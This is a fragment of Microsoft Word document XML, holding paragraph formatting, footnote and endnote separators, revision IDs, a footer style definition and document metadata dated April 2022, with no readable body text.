    <w:p w14:paraId="5456D90D" w14:textId="77777777" w:rsidR="00D91E0A" w:rsidRDefault="00D91E0A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CFE7DA8" w14:textId="77777777" w:rsidR="008F073E" w:rsidRPr="00CD41FA" w:rsidRDefault="008F073E" w:rsidP="00CD41FA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76E331A5" w14:textId="77777777" w:rsidR="00CD41FA" w:rsidRDefault="00CD41F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30FBB305" w14:textId="77777777" w:rsidR="00BE1FCC" w:rsidRPr="00241494" w:rsidRDefault="00BE1FCC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5F1E8DBE" w14:textId="77777777" w:rsidR="008B707A" w:rsidRPr="008B707A" w:rsidRDefault="008B707A" w:rsidP="00527180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25C97E2B" w14:textId="77777777" w:rsidR="00527180" w:rsidRPr="00527180" w:rsidRDefault="00527180" w:rsidP="00527180">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00527180" w:rsidRPr="0052718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A699" w14:textId="77777777" w:rsidR="006C3E40" w:rsidRDefault="006C3E40" w:rsidP="00D91E0A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35A664B2" w14:textId="77777777" w:rsidR="006C3E40" w:rsidRDefault="006C3E40" w:rsidP="00D9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9053D" w14:textId="6EB7A322" w:rsidR="00D91E0A" w:rsidRDefault="00D91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1BA2A" w14:textId="77777777" w:rsidR="00D91E0A" w:rsidRDefault="00D91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CBEF" w14:textId="77777777" w:rsidR="006C3E40" w:rsidRDefault="006C3E40" w:rsidP="00D91E0A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F94D3EB" w14:textId="77777777" w:rsidR="006C3E40" w:rsidRDefault="006C3E40" w:rsidP="00D9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4"/>
    <w:rsid w:val="0008215B"/>
    <w:rsid w:val="002013D9"/>
    <w:rsid w:val="00241494"/>
    <w:rsid w:val="00310FEF"/>
    <w:rsid w:val="00434D86"/>
    <w:rsid w:val="004426E9"/>
    <w:rsid w:val="00527180"/>
    <w:rsid w:val="00530648"/>
    <w:rsid w:val="005539B4"/>
    <w:rsid w:val="00605C07"/>
    <w:rsid w:val="006C3E40"/>
    <w:rsid w:val="007545F1"/>
    <w:rsid w:val="007C03D0"/>
    <w:rsid w:val="008B707A"/>
    <w:rsid w:val="008F073E"/>
    <w:rsid w:val="00992A65"/>
    <w:rsid w:val="00BE1FCC"/>
    <w:rsid w:val="00CD41FA"/>
    <w:rsid w:val="00D91E0A"/>
    <w:rsid w:val="00E310DA"/>
    <w:rsid w:val="00F41B28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0AE7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9A86980-35DF-4992-A9EC-5451E1B1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7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E0A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D9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5</cp:revision>
  <cp:lastPrinted>2022-04-15T10:51:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-12T01:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-15T10:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>